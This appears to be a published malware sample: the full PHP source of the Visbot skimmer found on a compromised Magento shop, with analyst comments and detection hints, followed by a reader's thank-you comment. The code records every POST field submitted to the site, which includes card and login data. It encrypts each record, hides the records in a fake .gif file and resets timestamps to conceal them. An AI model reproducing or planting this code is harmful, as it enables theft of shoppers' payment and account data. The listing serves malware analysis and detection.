visbot-beautified.php
<?PHP | |
// Analyst annotations: this listing is a captured sample; code lines are kept exactly as found.
// $y0: the file that captured request data is appended to (see the file_put_contents calls further down).
// The path ends in .gif and sits in an images directory, but nothing in this script writes image data to it.
$y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif'; | |
// $m1: fallback modification time (a Unix timestamp) handed to touch() when $y0 does not exist yet.
$m1 = '1382961301'; | |
// $k2: name of the GET parameter that makes the control branch empty the drop file.
$k2 = 'pa89785e'; | |
// $k3: PEM public key used to wrap the per-request AES key. No private key appears in this script,
// so the stored records cannot be decrypted with material found in this file alone.
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----"; | |
// Control branch: taken only when the User-Agent header equals this exact string (loose == comparison).
// No other check is visible here, so the header value is the only gate on this branch.
// Detection: the User-Agent value is a fixed string and can be matched in web access logs.
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') { | |
// With the $k2 GET parameter present, the drop file is truncated and the reply is 'clean ok'.
if (isset($_GET[$k2])) { | |
// Remember the current mtime (or the hard-coded fallback) before writing.
$m1 = file_exists($y0) ? @filemtime($y0) : $m1; | |
// Overwrite the drop file with an empty string, discarding the stored records.
@file_put_contents($y0, ''); | |
// Put the remembered mtime/atime back so the write is not visible from mtime alone.
@touch($y0, $m1, $m1); | |
echo 'clean ok'; | |
} else | |
echo 'Pong'; | |
// Both paths stop here; the capture code below never runs for a control request.
exit; | |
} | |
// Choose the address stored with each record: Client-IP header first, then X-Forwarded-For, then REMOTE_ADDR.
// The first two come from request headers, so for incident reconstruction the stored value is not a
// reliable source address; correlate with the web server's own logs instead.
if (!empty($_SERVER['HTTP_CLIENT_IP'])) { | |
$i4 = $_SERVER['HTTP_CLIENT_IP']; | |
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { | |
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR']; | |
} else { | |
$i4 = @$_SERVER['REMOTE_ADDR']; | |
} | |
// Runs for every request that carries POST fields and flattens $_POST into one string of
// ':name=value' pairs. There is no filter on field names: whatever the form submitted is recorded.
if (isset($_POST) && sizeof($_POST)) { | |
$a5 = ''; | |
foreach ($_POST as $h6 => $n7) { | |
if (is_array($n7)) { | |
foreach ($n7 as $f8 => $l9) { | |
if (is_array($l9)) { | |
foreach ($l9 as $l10 => $v11) { | |
// Arrays nested deeper than three levels are skipped (empty statement).
if (is_array($v11)) { | |
; | |
} else { | |
// Third-level scalar, written as ':name[key][key]=value'.
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11; | |
} | |
} | |
} else { | |
// Second-level scalar, written as ':name[key]=value'.
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9; | |
} | |
} | |
} else { | |
// Top-level scalar, written as ':name=value'.
$a5 .= ':' . $h6 . '=' . $n7; | |
} | |
} | |
// The chosen client address is placed in front of the flattened fields.
$a5 = $i4 . $a5; | |
} else { | |
// Requests without POST data leave nothing to store.
$a5 = null; | |
} | |
// Storage stage: runs only when the previous stage produced a non-empty record.
if ($a5) { | |
// $t12 becomes true when the three OpenSSL functions used below are available.
$t12 = false; | |
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) { | |
$t12 = true; | |
} elseif (function_exists('dl')) { | |
// OpenSSL missing: try to load the extension at run time, picking .dll or .so from the OS name.
$n13 = strtolower(substr(php_uname(), 0, 3)); | |
$d14 = 'php_openssl.' . ($n13 == 'win' ? 'dll' : 'so'); | |
@dl($d14); | |
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) { | |
$t12 = true; | |
} | |
} | |
if ($t12) { | |
// Hybrid scheme: a per-request key is wrapped with the embedded public key,
// and the record itself is encrypted with that key using 'aes128'.
$t15 = @openssl_get_publickey($k3); | |
// Chunk size for the public-key step.
$q16 = 128; | |
$t17 = ''; | |
// Per-request key: an MD5 hex string built from microtime() and rand().
$h18 = md5(md5(microtime()) . rand()); | |
$e19 = $h18; | |
// Consume the key in $q16-byte pieces; an MD5 hex string is 32 characters, so one pass is expected.
while ($e19) { | |
$f20 = substr($e19, 0, $q16); | |
$e19 = substr($e19, $q16); | |
@openssl_public_encrypt($f20, $h21, $t15); | |
$t17 .= $h21; | |
} | |
$t22 = @openssl_encrypt($a5, 'aes128', $h18); | |
@openssl_free_key($t15); | |
// Stored layout: wrapped key, the literal ':::SEP:::', then the encrypted record.
$a5 = $t17 . ':::SEP:::' . $t22; | |
} | |
// When OpenSSL is unavailable the record is left as-is, so what gets written below is
// only base64-encoded, which matters when assessing exposure from a recovered drop file.
// Remember the current mtime (or the hard-coded fallback) before appending.
$m1 = file_exists($y0) ? @filemtime($y0) : $m1; | |
// Each record is appended as the marker 'JPEG-1.1' followed by base64 text.
// Detection: a file under an images path containing that marker followed by base64 is a usable content signature.
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND); | |
// Put the remembered mtime/atime back so the append is not visible from mtime alone.
// NOTE(review): touch() sets access/modification time only; on POSIX filesystems the inode change
// time should still move, so a ctime later than mtime is a lead to verify on the affected host.
@touch($y0, $m1, $m1); | |
} | |
?><?php |
invalidquery commented Dec 2, 2016
Thank you for publicizing this Willem, keep up the great research work!